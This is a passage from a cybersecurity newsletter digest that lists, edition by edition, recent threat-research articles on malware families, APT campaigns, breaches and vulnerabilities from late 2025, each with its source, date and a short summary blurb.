zLabs identified “Fantasy Hub,” an Android Remote Access Trojan sold on Russian-language channels under a Malware-as-a-Service (MaaS) subscription. Read more.


The Cat’s Out of the Bag: A ‘Meow Attack’ Data Corruption Campaign Simulation via MAD-CAT

Source: Trustwave SpiderLabs
(Published: 7 November 2025)
In 2024, I published Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack), which explored the notorious Meow attack campaign that had plagued unsecured databases since 2020. Read more.


Multi-Platform VanHelsing Ransomware (RaaS) Analysis

Source: Picus Security
(Published: 8 November 2025)
A new and rapidly expanding ransomware operation, dubbed VanHelsing, has emerged on the cybercrime scene. Read more.


Ferocious Kitten APT Exposed: Inside the Iran-Focused Espionage Campaign

Source: Picus Security
(Published: 10 November 2025)
Ferocious Kitten is a covert cyber-espionage actor active since at least 2015 that has focused on Persian-speaking targets inside Iran, using politically themed decoy documents to trick dissidents, activists, and other individuals into opening weaponized files. Read more.


GreenCharlie APT: Iran’s PowerShell-Based Cyber Espionage Campaigns

Source: Picus Security
(Published: 11 November 2025)
GreenCharlie is an Iran-based advanced persistent threat (APT) group known for its active cyber-espionage and phishing operations. Read more.


MalKamak APT’s ShellClient RAT: Inside Operation GhostShell

Source: Picus Security
(Published: 11 November 2025)
MalKamak group has been active since at least 2018 and was observed in a targeted espionage campaign that peaked in July 2021, focusing primarily on the aerospace and telecommunications sectors in the Middle East, with additional victims in the U.S., Russia, and Europe. Read more.


NGate: NFC Relay Malware Enabling ATM Withdrawals Without Physical Cards

Source: Zimperium
(Published: 12 November 2025)
CERT Polska has recently uncovered a sophisticated Android malware family dubbed NGate, designed to perform NFC relay attacks targeting Polish bank customers. Read more.


Operation Endgame Quakes Rhadamanthys

Source: Proofpoint
(Published: 13 November 2025)
Rhadamanthys malware has evolved significantly over time, reflecting ongoing advancements in cybercriminal techniques. Read more.


Increase in Lumma Stealer Activity Coincides with Use of Adaptive Browser Fingerprinting Tactics

Source: Trend Micro
(Published: 13 November 2025)
In this blog entry, Trend Research analyses the layered command-and-control approaches that Lumma Stealer uses to maintain its ongoing operations while enhancing collection of victim-environment data. Read more.


NotDoor Insights: A Closer Look at Outlook Macros and More

Source: Splunk
(Published: 14 November 2025)
This blog helps security analysts, blue teamers, and Splunk customers identify NotDoor, and similar malware, by enabling the community to discover related TTPs used by threat actors and adversaries. Read more.


Hide Me Again: The Updated Multi-Payload .NET Steganography Loader That Includes Lokibot

Source: Splunk
(Published: 14 November 2025)
In this blog, the Splunk Threat Research Team presents an analysis of the updated steganographic loader, including one of its payloads: the Lokibot malware. Read more.

Want more articles beyond these November 2025 cyber threat reports? Check out the previous edition of Security Signals here. 

Take advantage of our free data evaluation.

Security Signals (10/07/25-10/21/25)

This Edition’s Articles

In these late October 2025 cyber threat reports, global research teams uncovered an active mix of espionage, phishing, and data-theft operations. Highlights this period include North Korea’s EtherHiding and Contagious Interview campaigns, new exploits such as the Oracle EBS zero-day, COLDRIVER and Lazarus-linked attacks, and mobile threats like Pixnapping targeting Android users. Together, these findings reveal how rapidly evolving malware, cloud intrusions, and supply-chain compromises continue to test defenders’ visibility and response.

An Insider Look At The IRGC-linked APT35 Operations: Ep1 & Ep2

Source: CloudSEK
(Published: 7 October 2025)
CloudSEK’s TRIAD team analyzed the available evidence and reconstructed recent APT35 operations across two episodes of our series. Read more.


Attacker says they breached Huawei, source code sold online

Source: Cybernews
(Published: 7 October 2025)
A hacker claims to have stolen Huawei’s internal source code and sold it on an underground cybercriminal forum. Read more.


Oops! It’s a kernel stack use-after-free: Exploiting NVIDIA’s GPU Linux drivers

Source: Quarkslab
(Published: 14 October 2025)
This article details two bugs in NVIDIA’s GPU kernel driver vmalloc handling that can be chained to gain code execution in kernel context. Read more.


BombShell: The Signed Backdoor Hiding in Plain Sight on Framework Devices

Source: Eclypsium
(Published: 14 October 2025)
UEFI shell vulnerabilities allow attackers to bypass Secure Boot. Read more.


DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains

Source: Google Cloud Blog
(Published: 16 October 2025)
Google Threat Intelligence Group (GTIG) has observed a new malware delivery technique, EtherHiding, appearing in DPRK-linked activity. Read more.


BeaverTail and OtterCookie evolve with a new Javascript module

Source: Cisco Talos Blog
(Published: 16 October 2025)
Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). Read more.


Odyssey Stealer and AMOS Campaign Targets macOS Developers Through Fake Tools

Source: Hunt
(Published: 16 October 2025)
In recent months, our threat hunting team has observed a surge in macOS-targeted campaigns employing new social engineering tactics and persistent infrastructure. Read more.


New Group on the Block: UNC5142 Leverages EtherHiding to Distribute Malware

Source: Google Cloud Blog
(Published: 16 October 2025)
Since late 2023, UNC5142 has leveraged EtherHiding infrastructure to deliver malicious payloads and obfuscate attribution. Read more.


Joint Intel Strike – DeepCode × AMLBot Trace “1688shuju,” a Darknet Seller of Verified Exchange Numbers

Source: AMLBot
(Published: 17 October 2025)
On 22 August 2025, the DeepCode intelligence team identified a darknet marketplace listing by the actor “1688shuju” offering large batches of verified phone numbers tied to major cryptocurrency exchanges. Read more.


Email Bombs Exploit Lax Authentication in Zendesk

Source: Krebs on Security
(Published: 17 October 2025)
Cybercriminals are abusing a widespread lack of authentication in the customer service platform Zendesk to flood targeted email inboxes with menacing messages that come from hundreds of Zendesk corporate customers simultaneously. Read more.


Tykit Analysis: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance

Source: ANY.RUN
(Published: 21 October 2025)
Not long ago we reported a spike in phishing attacks that use an SVG file as the delivery vector. Read more.


To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER

Source: Google Cloud Blog
(Published: 21 October 2025)
COLDRIVER, a Russian state-sponsored threat group known for targeting high-profile individuals in NGOs, policy advisors, and dissidents, swiftly shifted operations after the May 2025 public disclosure of its LOSTKEYS malware. Read more.


Red Hat data breach escalates as ShinyHunters joins extortion

Source: BleepingComputer
(Published: 6 October 2025)
Enterprise software giant Red Hat is now being extorted by the ShinyHunters gang, with samples of stolen customer engagement reports (CERs) leaked on their data leak site. Read more.


OpenAI has disrupted (more) Chinese accounts using ChatGPT to create social media surveillance tools

Source: Engadget
(Published: 7 October 2025)
OpenAI published a new threat report and banned additional China-linked accounts that used ChatGPT to design social media surveillance tools. Read more.


Maverick: Android banking trojan distributing via WhatsApp

Source: Securelist
(Published: 8 October 2025)
A malware campaign was recently detected distributing various versions of the Android banking trojan called ‘Maverick’ via WhatsApp. Read more.


Phishing campaign leveraging the npm ecosystem

Source: Snyk
(Published: 9 October 2025)
We have uncovered a large-scale phishing campaign abusing the npm ecosystem to deliver malware to developers through typosquatted packages and malicious maintainers. Read more.


Harvard University hit in Oracle EBS cyberattack, 1.3 TB of data leaked by Cl0p group

Source: Security Affairs
(Published: 10 October 2025)
Harvard University was hit in a cyberattack exploiting a zero-day in Oracle E-Business Suite (EBS), with the Cl0p ransomware gang leaking 1.3 TB of data. Read more.


PhantomVAI Loader Delivers a Range of Infostealers

Source: Unit 42 (Palo Alto Networks)
(Published: 15 October 2025)
Unit 42 researchers have been tracking phishing campaigns that use PhantomVAI Loader to deliver information-stealing malware through a multi-stage, evasive infection chain. Read more.


Pro-Hamas hackers breach B.C. and U.S. airport display systems

Source: Juno News
(Published: 15 October 2025)
A pro-Hamas Islamist group has taken credit for a series of cyberattacks at two B.C. airports and others in the U.S. Read more.


PassiveNeuron: campaign with APT implants and Cobalt Strike

Source: Securelist
(Published: 17 October 2025)
The PassiveNeuron (also known as ‘Evernight’) cyber espionage campaign relies on a broad arsenal of tools, including clusters of implants, Cobalt Strike, and modern living-off-the-land strategies. Read more.


SIMCartel operation: Europol takes down SIM box ring linked to 3,200 scams

Source: Security Affairs
(Published: 18 October 2025)
Europol has taken down a multi-country SIM boxing ring dubbed ‘SIMCartel,’ dismantling infrastructure linked to more than 3,200 scams. Read more.


F5 breach exposes 262,000 BIG-IP systems worldwide

Source: Security Affairs
(Published: 19 October 2025)
Security firm F5 disclosed a breach exposing telemetry data from 262,000 BIG-IP systems worldwide after attackers accessed a support platform. Read more.


Russian Lynk group leaks sensitive UK MoD files, including info on eight military bases

Source: Security Affairs
(Published: 20 October 2025)
The Russian hacktivist group Lynk leaked sensitive UK Ministry of Defence files, including details on eight military bases. Read more.


Salty Much: Darktrace’s view on a recent Salt Typhoon intrusion

Source: Darktrace
(Published: 20 October 2025)
Salt Typhoon, a China-linked cyber espionage group, has been observed targeting global infrastructure using stealthy techniques such as DLL sideloading and zero-day exploits. Read more.


Disrupting threats targeting Microsoft Teams

Source: Microsoft Security Blog
(Published: 7 October 2025)
The extensive collaboration features and global adoption of Microsoft Teams make it a high-value target for both cybercriminals and state-sponsored actors. Read more.


Crimson Collective: A New Threat Group Observed Operating in the Cloud

Source: Rapid7 Labs
(Published: 7 October 2025)
Over the past few weeks, Rapid7 has observed increased activity of a new threat group attacking AWS cloud environments with the goal of data exfiltration and subsequent extortion. Read more.


Pixel-stealing “Pixnapping” attack targets Android devices

Source: Malwarebytes
(Published: 14 October 2025)
Researchers at US universities have demonstrated how a malicious Android app can trick the system into leaking pixel data. Read more.


Retro Phishing: Basic Auth URLs Make a Comeback in Japan

Source: Netcraft
(Published: 15 October 2025)
Netcraft recently uncovered a suspicious URL targeting GMO Aozora Bank, a Japanese financial institution. Read more.


Inside the attack chain: Threat activity targeting Azure Blob Storage

Source: Microsoft Security Blog
(Published: 20 October 2025)
Azure Blob Storage is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale. Read more.


North Korea’s Contagious Interview Campaign Escalates: 338 Malicious npm Packages, 50,000 Downloads

Source: Socket
(Published: 10 October 2025)
The Contagious Interview operation continues to weaponize the npm registry with a repeatable playbook. Read more.


Espionage Exposed: Inside a North Korean Remote Worker Network

Source: KELA
(Published: 10 October 2025)
Thousands of North Korean IT workers are hiding in plain sight, blending into the global freelance economy, building your apps, or even designing your infrastructure. Read more.


Microsoft revamps Internet Explorer Mode in Edge after August attacks

Source: Security Affairs
(Published: 13 October 2025)
Microsoft has revamped the Internet Explorer (IE) mode in the Edge browser to fix an issue that threat actors exploited for attacks in August 2025. Read more.


TigerJack’s Extensions Continue to Rob Developers Blind Across Different Marketplaces

Source: Koi
(Published: 13 October 2025)
Meet TigerJack – a threat actor we’ve been tracking since early 2025, who has systematically infiltrated developer marketplaces with at least 11 malicious VS Code extensions across multiple publisher accounts. Read more.


Oracle silently fixes zero-day exploit leaked by ShinyHunters

Source: BleepingComputer
(Published: 14 October 2025)
Oracle has silently fixed an Oracle E-Business Suite vulnerability (CVE-2025-61884) that was actively exploited to breach servers, with a proof-of-concept exploit publicly leaked by the ShinyHunters extortion group. Read more.


Want more articles? Check out the previous edition of Security Signals here. 


Security Signals (09/23/25-10/7/25)

This Edition’s Articles

Late September to early October 2025 cybersecurity news: Oracle, Red Hat, Cisco and Discord! High-profile corporate breaches and exploited vulnerabilities, persistent APT campaigns, and novel malware variants dominated the threat landscape. Enterprise vendors patched critical flaws, ransomware crews refined their tactics, and state-linked actors expanded their global reach, all underscoring the need for continuous vigilance.

YiBackdoor: A New Malware Family With Links to IcedID and Latrodectus

Source: Zscaler
(Published: 23 September 2025)
Zscaler ThreatLabz has identified a new malware family that we named YiBackdoor, which was first observed in June 2025. Read more.


Lazarus Group: A Criminal Syndicate With a Flag

Source: Barracuda
(Published: 23 September 2025)
The Lazarus Group is a notorious state-sponsored cybercrime organization linked to the Democratic People’s Republic of Korea (DPRK). Read more.


Fighting Telecom Cyberattacks: Investigating a Campaign Against UK Companies

Source: ANY.RUN
(Published: 24 September 2025)
Telecommunications companies are the digital arteries of modern civilization. Read more.


ED 25-03: Identify and Mitigate Potential Compromise of Cisco Devices

Source: Cybersecurity and Infrastructure Security Agency (CISA)
(Published: 25 September 2025)
This page contains a web-friendly version of CISA Emergency Directive 25-03: Identify and Mitigate Potential Compromise of Cisco Devices. Read more.


Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less

Source: Arctic Wolf
(Published: 26 September 2025)
Since late July 2025, Arctic Wolf has observed an ongoing surge in Akira ransomware activity targeting SonicWall firewalls through malicious SSL VPN logins. Read more.


Cavalry Werewolf raids Russia’s public sector with trusted relationship attacks

Source: BI.ZONE
(Published: 2 October 2025)
BI.ZONE Threat Intelligence recorded Cavalry Werewolf activity from May to August 2025. Read more.


CERT-UA warns UAC-0245 targets Ukraine with CABINETRAT backdoor

Source: Security Affairs
(Published: 2 October 2025)
The Computer Emergency Response Team of Ukraine (CERT-UA) warned of cyberattacks by the group UAC-0245 using the CABINETRAT backdoor. Read more.


Update on a Security Incident Involving Third-Party Customer Service

Source: Discord
(Published: 3 October 2025)
At Discord, protecting the privacy and security of our users is a top priority. Read more.


Palo Alto Scanning Surges ~500% in 48 Hours, Marking 90-Day High

Source: GreyNoise
(Published: 3 October 2025)
On October 3, 2025, GreyNoise observed a ~500% increase in IPs scanning Palo Alto Networks login portals, the highest level recorded in the past 90 days. Read more.


Lunar Spider Expands Their Web via FakeCaptcha

Source: NVISO Labs
(Published: 1 October 2025)
Lunar Spider is increasingly using phishing kits disguised as CAPTCHA widgets to drive credential theft. Read more.


Silent Smishing: The Hidden Abuse of Cellular Router APIs

Source: SEKOIA
(Published: 2 October 2025)
Attackers are increasingly exploiting APIs in cellular routers to perform silent smishing without user awareness. Read more.


UAT-8099: Chinese-Speaking Cybercrime Group SEO Fraud Campaign

Source: Talos
(Published: 3 October 2025)
Talos has observed a campaign dubbed UAT-8099 in which a Chinese-speaking threat group uses SEO-fraud techniques to drive traffic to malicious sites. Read more.


Detour Dog DNS Malware Powers Strela Stealer Campaigns

Source: Infoblox Threat Intelligence
(Published: 3 October 2025)
A new DNS-based malware loader named Detour Dog is being used to deliver Strela Stealer in targeted attacks. Read more.


BrickStorm: New Espionage Campaign Targeting Cloud Assets

Source: Google Cloud Blog
(Published: 4 October 2025)
BrickStorm is a newly uncovered espionage campaign that targets cloud infrastructure with credential harvesting and lateral movement. Read more.


UNC6040: Proactive Hardening Recommendations

Source: Google Cloud Blog
(Published: 5 October 2025)
The UNC6040 cluster has been active in recent months; here are recommended proactive hardening steps to reduce exposure. Read more.


Inside Vietnamese Threat Actor “Lone None’s” Copyright Takedown Spoofing Campaign

Source: Cofense
(Published: 6 October 2025)
A Vietnamese threat actor dubbed “Lone None” has been using fraudulent copyright takedown notices to trick companies into redirecting their domains. Read more.


Raytheon Confirms Ransomware Attack on Airline Check-In Systems

Source: CyberInsider
(Published: 7 October 2025)
Raytheon Technologies has publicly acknowledged a ransomware intrusion into airline check-in infrastructure. Read more.


BreachStars Emerges as BreachForums Replacement Marketplace

Source: CyberNews
(Published: 7 October 2025)
BreachStars is positioning itself as a successor to the shuttered BreachForums, offering data-leak marketplace services. Read more.


NIST Warns of Flawed DeepSeek: Security CCP Narratives

Source: CyberNews
(Published: 4 October 2025)
The U.S. National Institute of Standards and Technology (NIST) has flagged flaws in DeepSeek that may amplify CCP information narratives. Read more.


Inside Salt Typhoon: China’s State-Corporate Advanced Persistent Threat

Source: DomainTools Investigations (DTI)
(Published: 24 September 2025)
Salt Typhoon is a Chinese state-sponsored cyber threat group aligned with the Ministry of State Security (MSS), specializing in long-term espionage operations targeting global telecommunications infrastructure. Read more.


Better Analyzing Foreign Adversary Threats to Open-Source Software

Source: Margin Research
(Published: 30 September 2025)
Global contributions to open-source software (OSS) add tremendous value: for years, they have forged connections between developers around the world, enabled dispersed and specialized talent to build better software for users, and collectively helped ensure that OSS remains available, updated, and relevant for users everywhere. Read more.


TradingView Scam Expands to Google Ads & YouTube

Source: HackRead
(Published: 26 September 2025)
A malicious advertising campaign that has been tricking content creators and unsuspecting users into downloading harmful software by offering “free access” to TradingView Premium has dramatically expanded its operations. Read more.


Operation SouthNet: SideWinder Expands Phishing & Malware in South Asia

Source: Hunt.io
(Published: 1 October 2025)
APT SideWinder, a highly active state-sponsored threat group known for its long-standing espionage campaigns across South Asia, has once again launched a targeted operation. Read more.


Breakingdown of Patchwork APT

Source: K7 Labs
(Published: October 2025)
It enforces the use of TLS 1.2 to ensure secure, encrypted transmission and sends the POST request containing the encoded victim data to the C2. Read more.


Patchwork APT Exploits Macros & Scheduled Tasks for Stealthy C2/Exfil

Source: Varutra / ThreatPost
(Published: 1 October 2025)
Patchwork (aka Dropping Elephant/Monsoon/Hangover Group) is an APT active since at least 2015 targeting political and military intelligence across South and Southeast Asia. Read more.


Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite

Source: Unit 42 / Palo Alto Networks
(Published: 30 September 2025)
After a two-and-a-half-year investigation, Palo Alto Networks Unit 42 has formally named a sophisticated, Chinese nation-state actor: Phantom Taurus. Read more.


DrayTek warns of remote code execution bug in Vigor routers

Source: BleepingComputer
(Published: 2 October 2025)
Networking hardware maker DrayTek released an advisory to warn about a security vulnerability in several Vigor router models that could allow unauthenticated actors to perform arbitrary code execution. Read more.


Oracle patches EBS zero-day exploited in Clop data theft attacks

Source: BleepingComputer
(Published: 3 October 2025)
Oracle has released emergency patches for a zero-day vulnerability in its EBS software suite that was being actively exploited by Clop ransomware actors in data theft campaigns. Read more.


Klopatra: Exposing a new Android banking Trojan operation with roots in Turkey

Source: Cleafy Labs
(Published: 30 September 2025)
A previously undocumented Android banking trojan called Klopatra has compromised over 3,000 devices, leveraging hidden VNC and overlay techniques to conduct fraudulent transactions. Read more.


Yurei Ransomware: The Digital Ghost

Source: Cyfirma
(Published: 1 October 2025)
The Yurei ransomware is unique in its modular architecture and stealthy data-exfiltration staging ahead of encryption. Read more.


Revisiting WarmCookie: Memory-Based Cookie Abuse Techniques

Source: Elastic Security Labs
(Published: 2 October 2025)
Elastic’s security labs analyzed “WarmCookie,” a technique that abuses in-memory cookie structures to facilitate stealthy session hijacking. Read more.


USD 439 Million Recovered in Global Financial Crime Operation

Source: INTERPOL
(Published: 2 October 2025)
INTERPOL announced the recovery of USD 439 million following coordinated takedowns of transnational financial crime networks. Read more.


Red Hat confirms major data breach

Source: The Cyber Security Hub / LinkedIn
(Published: 3 October 2025)
Red Hat has acknowledged a data breach affecting its infrastructure, exposing internal systems and potentially impacting enterprise customers. Read more.


XCSSET evolves again: analyzing the latest updates to XCSSET’s inventory

Source: Microsoft Security Blog
(Published: 25 September 2025)
Microsoft details the latest evolutions of the XCSSET iOS/macOS malware family, tracking new features and command modules. Read more.


Persistent malicious targeting of Cisco devices

Source: UK National Cyber Security Centre (NCSC)
(Published: 4 October 2025)
The UK NCSC warns of ongoing campaigns targeting Cisco network gear, including VPNs and switches, seeking to exploit known vulnerabilities. Read more.


RedNovember targets government, defense, and technology organizations

Source: Recorded Future
(Published: 4 October 2025)
The RedNovember campaign focuses on intelligence collection, using custom backdoors to infiltrate national governments and defense contractors. Read more.


LameHug: AI-Driven Malware & LLM Cyber Intrusion Analysis

Source: Splunk Security Blog
(Published: 4 October 2025)
Splunk researchers explore “LameHug,” a proof-of-concept malware that uses large language models to adapt actions based on environment feedback. Read more.


Self-propagating malware spreads via WhatsApp

Source: Trend Micro Research
(Published: 5 October 2025)
A new self-propagating worm exploits WhatsApp forwarding mechanics to spread, bypassing typical app store oversight. Read more.


US Secret Service blocks massive telecom attack in New York

Source: Trustwave SpiderLabs Blog
(Published: 5 October 2025)
The U.S. Secret Service intervened to disrupt a large-scale telecom infrastructure attack in New York orchestrated by a state-aligned actor. Read more.


Salesforce leak, extortion attempts tied to Scattered / Lapsus Hunters

Source: UpGuard Blog
(Published: 6 October 2025)
UpGuard discloses a data leak and ongoing extortion campaign from the group “Scattered / Lapsus Hunters,” with exposed Salesforce credentials circulating online. Read more.

Want more articles? Check out the previous edition of Security Signals here. 


Security Signals (09/09/25 – 09/23/25)

This Edition’s Articles

Analysis of Backdoor.WIN32.Buterat

Source: Point Wild
(Published: 9 September 2025)
Backdoor malware is a covert type of malicious software designed to bypass standard authentication mechanisms and provide persistent, unauthorized access to compromised systems. Read more.


Threat Actor Accidentally Exposes AI-Powered Operations

Source: Infosecurity Magazine
(Published: 9 September 2025)
A threat actor has unintentionally revealed their methods and day-to-day activities after installing Huntress security software on their own environment. Read more.


AsyncRAT in Action: Fileless Malware Techniques and Analysis of a Remote Access Trojan

Source: LevelBlue
(Published: 10 September 2025)
Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. Read more.


New FileFix Campaign Goes Beyond PoC and Leverages Steganography

Source: Acronis / Tru
(Published: 10 September 2025)
Acronis Threat Research has observed a new FileFix campaign that uses steganographic embedding of payloads to evade detection. Read more.


Uncloaking TA415: China-Aligned Actor Conducts US-China Economic Relations Attacks

Source: Proofpoint
(Published: 11 September 2025)
Proofpoint has published findings on TA415, a China-aligned threat actor, revealing operations targeting US–China economic relations. Read more.


Threat Spotlight: ShinyHunters Data Breach Targets Salesforce Amid Scattered Spider Collaboration

Source: ReliaQuest
(Published: 11 September 2025)
ReliaQuest has observed a coordinated campaign where ShinyHunters collaborated with Scattered Spider to breach Salesforce environments. Read more.


Yurei & The Ghost of Open Source Ransomware

Source: Check Point Research
(Published: 12 September 2025)
First observed on September 5, Yurei is a newly emerged ransomware group that targeted a Sri Lankan food manufacturing company as its first leaked victim. Read more.


Modified ZLoader Variants & Updates Analyzed

Source: Zscaler
(Published: 15 September 2025)
Zscaler ThreatLabz has published new technical findings on recent updates and modifications to the ZLoader malware family. Read more.


Supporting Rowhammer Research to Understand Vulnerabilities in Memory Hardware

Source: Google Security Blog
(Published: 16 September 2025)
Google researchers detail new findings on Rowhammer and how fundamental memory hardware vulnerabilities can be further studied. Read more.


EggStreme Malware: Unpacking a New APT Framework Targeting a Philippine Military Company

Source: Bitdefender
(Published: 17 September 2025)
This report analyzes a sophisticated cyber-attack targeting a military company based in the Philippines, which led to the discovery of a new and advanced malware toolset. Read more.


HIVE0154 Drops Updated ToneShell Backdoor

Source: IBM X-Force
(Published: 17 September 2025)
IBM X-Force has uncovered HIVE0154, a threat actor deploying updated ToneShell backdoor variants in the wild. Read more.


ShadowV2: An Emerging DDoS-for-Hire Botnet

Source: Darktrace
(Published: 18 September 2025)
Darktrace reports on ShadowV2, a botnet-as-a-service model built for DDoS operations and evolving evasion tactics. Read more.


How Attackers Abuse ScreenConnect and Open Directories (AsyncRAT Campaigns Uncovered)

Source: Hunt.io
(Published: 18 September 2025)
Research shows how attackers are abusing ScreenConnect installers hosted in open directories to deliver AsyncRAT payloads. Read more.


Modus Operandi of “Subtle Snail” Threat Group

Source: Prodaft / Catalyst
(Published: 19 September 2025)
Prodaft’s Catalyst team describes the TTPs, infrastructure, and attack cycles of the Subtle Snail threat group. Read more.


Inside China’s Surveillance and Propaganda Industries: Where Profit Meets Party

Source: The Diplomat
(Published: 21 September 2025)
The Diplomat explores how China monetizes surveillance and propaganda within its media, tech, and security sectors. Read more.


Cybersecurity Incident at European Airports Caused by Ransomware

Source: SCWorld
(Published: 22 September 2025)
Several European airports have reported system outages traced to a ransomware attack affecting operational systems. Read more.


MalTerminal: An LLM-Enabled Malware Pioneer Exposed

Source: SecurityAffairs
(Published: 23 September 2025)
SecurityAffairs researchers have published a deep dive on MalTerminal, a new malware leveraging large language models to aid operators. Read more.


Technical Analysis of kkRAT

Source: Zscaler (ThreatLabz)
(Published: 10 September 2025)
Zscaler ThreatLabz has identified a malware campaign targeting Chinese-speaking users, active since early May 2025. Read more.


ChillyHell – a modular macOS backdoor

Source: Jamf Threat Labs
(Published: 8 September 2025)
During routine sample analysis, Jamf Threat Labs discovered a macOS backdoor showing a distinctive approach to process reconnaissance. Read more.


Uncloaking VoidProxy: a Novel and Evasive Phishing-as-a-Service Framework

Source: Okta Security
(Published: 11 September 2025)
Okta Threat Intelligence details a previously unreported Phishing-as-a-Service operation dubbed VoidProxy. Read more.


Introducing HybridPetya: Petya/NotPetya copycat with UEFI Secure Boot bypass

Source: ESET / WeLiveSecurity
(Published: 12 September 2025)
ESET Research has discovered HybridPetya on VirusTotal, showing traits reminiscent of Petya/NotPetya with a Secure Boot bypass. Read more.


Inside Maranhão Stealer: Node.js-Powered InfoStealer

Source: Cyble
(Published: 15 September 2025)
Cyble Research & Intelligence Labs detail a Node.js-based infostealer leveraging reflective DLL injection techniques. Read more.


Dark Web Profile: BQTLock Ransomware

Source: SOCRadar
(Published: 12 September 2025)
BQTLock is a RaaS that has drawn attention for disruptive operations and distinctive methods. Read more.


Threat Spotlight: Attackers Exploit Axios for Automated Phishing

Source: ReliaQuest
(Published: 9 September 2025)
ReliaQuest observed surges in stolen credentials linked to mass-automated phishing using the Axios user agent. Read more.


Going Underground: China-Aligned TA415 Conducts US-China Economic Relations Operations

Source: Proofpoint
(Published: 11 September 2025)
Proofpoint details TA415 campaigns aligned to US-China economic relations themes. Read more.



China-Linked APT41 Hackers Target US Government Agencies

Source: The Hacker News
(Published: 12 September 2025)
APT41, a China-linked group, has been observed targeting US agencies through credential theft and phishing. Read more.


KILLSEC Ransomware Is Attacking Healthcare Institutions in Brazil

Source: ReSecurity
(Published: 12 September 2025)
ReSecurity tracks KILLSEC ransomware activity against Brazilian healthcare institutions. Read more.


In-Depth Analysis of the “APT Down” – The North Korea Files Leak

Source: ENKI
(Published: September 2025)
ENKI provides an in-depth analysis related to the so-called North Korea Files leak, examining potential APT ties. Read more.


Inside the Lighthouse and Lucid PhaaS Campaigns Targeting 316 Global Brands

Source: Netcraft
(Published: 17 September 2025)
Netcraft examines Lighthouse and Lucid phishing-as-a-service operations observed targeting hundreds of brands worldwide. Read more.



Security Signals (08/26/25 – 09/09/25)


This Edition’s Articles

Countering China State Actors Compromise of Networks

Source: U.S. Department of Defense
(Published: September 2025)
People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. Read more.


Widespread Data Theft Targets Salesforce Instances via Salesloft Drift

Source: Google Cloud Blog
(Published: 26 August 2025)
Google Threat Intelligence Group is issuing an advisory to alert organizations about a widespread data theft campaign carried out by the actor tracked as UNC6395. Read more.


Velociraptor incident response tool abused for remote access

Source: Sophos News
(Published: 26 August 2025)
In August 2025, Counter Threat Unit researchers investigated an intrusion that involved deployment of the legitimate open-source Velociraptor digital forensics and incident response tool. Read more.


Breaking Down Mustang Panda Windows Endpoint Campaign

Source: Picus Security
(Published: 26 August 2025)
Researchers detail a Mustang Panda campaign that targets Windows endpoints with phishing and DLL sideloading to gain persistence. Read more.


TAG-144’s Persistent Grip On South American Organizations

Source: Recorded Future
(Published: 26 August 2025)
Insikt Group assesses that TAG-144 continues persistent intrusions in South America using credential theft and backdoors. Read more.


Malvertising Campaign On Meta Expands To A Wider Target Base, Pushing Advanced Crypto-Stealing Malware To Users Worldwide

Source: Bitdefender Labs
(Published: 26 August 2025)
Bitdefender observed a global malvertising wave across Meta platforms that delivers advanced crypto-stealing malware. Read more.


Storm-0501’s evolving techniques lead to cloud-based ransomware

Source: Microsoft Security Blog
(Published: 27 August 2025)
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to focus on cloud-based tactics, techniques, and procedures. Read more.


AI-Powered Ransomware Has Arrived With ‘PromptLock’

Source: Dark Reading
(Published: 27 August 2025)
It was probably inevitable – analysts have spotted the first known ransomware strain powered by artificial intelligence. Read more.


Tamperedchef – The Bad PDF Editor

Source: Truesec
(Published: 27 August 2025)
Truesec describes a large malvertising campaign luring victims into downloading a trojanized PDF editor that steals data. Read more.


MystRodX: A Covert Dual-Mode Backdoor

Source: XLab
(Published: 27 August 2025)
MystRodX is a typical backdoor implemented in C++, supporting features like file management, port forwarding, reverse shell, and socket management. Read more.


Malicious ScreenConnect Campaign Abuses AI-Themed Lures For XWorm Delivery

Source: Trustwave SpiderLabs
(Published: 27 August 2025)
Investigators uncovered a campaign that used fake AI content to trick users into running a preconfigured ScreenConnect installer that dropped XWorm. Read more.


From Threat To Test: Emulating Scattered Spider In Realistic Scenarios

Source: Lares Labs
(Published: 27 August 2025)
Read more.


ShadowSilk: A Cross-Border Binary Union For Data Theft

Source: Group-IB
(Published: 27 August 2025)
Read more.


Chasing the Silver Fox: Cat & Mouse in Kernel Shadows

Source: Check Point Research
(Published: 28 August 2025)
While Microsoft Windows has steadily strengthened its security model, threat actors have adapted by exploiting lower-level weaknesses that bypass these protections without triggering defenses. Read more.


Amazon disrupts watering hole campaign by Russia’s APT29

Source: AWS Security Blog
(Published: 29 August 2025)
Amazon’s threat intelligence team identified and disrupted a watering hole campaign conducted by APT29 using compromised websites to redirect visitors to malicious infrastructure. Read more.


How Attackers Adapt To Built-In macOS Protection

Source: Securelist (Kaspersky)
(Published: 29 August 2025)
Read more.


Sindoor Dropper – New Phishing Campaign

Source: Nextron Systems
(Published: 29 August 2025)
Nextron documents a new phishing wave that delivers a lightweight dropper dubbed Sindoor. Read more.


Experts Warn Of Actively Exploited FreePBX Zero-Day

Source: Security Affairs
(Published: 29 August 2025)
Researchers warn that a FreePBX zero-day is being exploited in the wild against Internet-exposed systems. Read more.


Hackers Use New HexStrike AI Tool To Rapidly Exploit N-Day Flaws

Source: BleepingComputer
(Published: 29 August 2025)
Threat actors are adopting an AI tool named HexStrike to accelerate exploitation of known vulnerabilities. Read more.


Salesloft Drift Breach: GitHub Compromise and OAuth Tokens

Source: Hackread
(Published: 07 September 2025)
Heard about the recent data breaches where attackers used the Salesloft Drift application to access Salesforce data? There’s now a major update. Read more.


Feds Seize Veriftools.net, Relaunch Veriftools.com

Source: Hackread
(Published: 31 August 2025)
U.S. authorities seized Veriftools.net and the operators relaunched the service at a new domain. Read more.


WhatsApp Fixes A Serious Vulnerability Used In Targeted Attacks

Source: BetaNews
(Published: 01 September 2025)
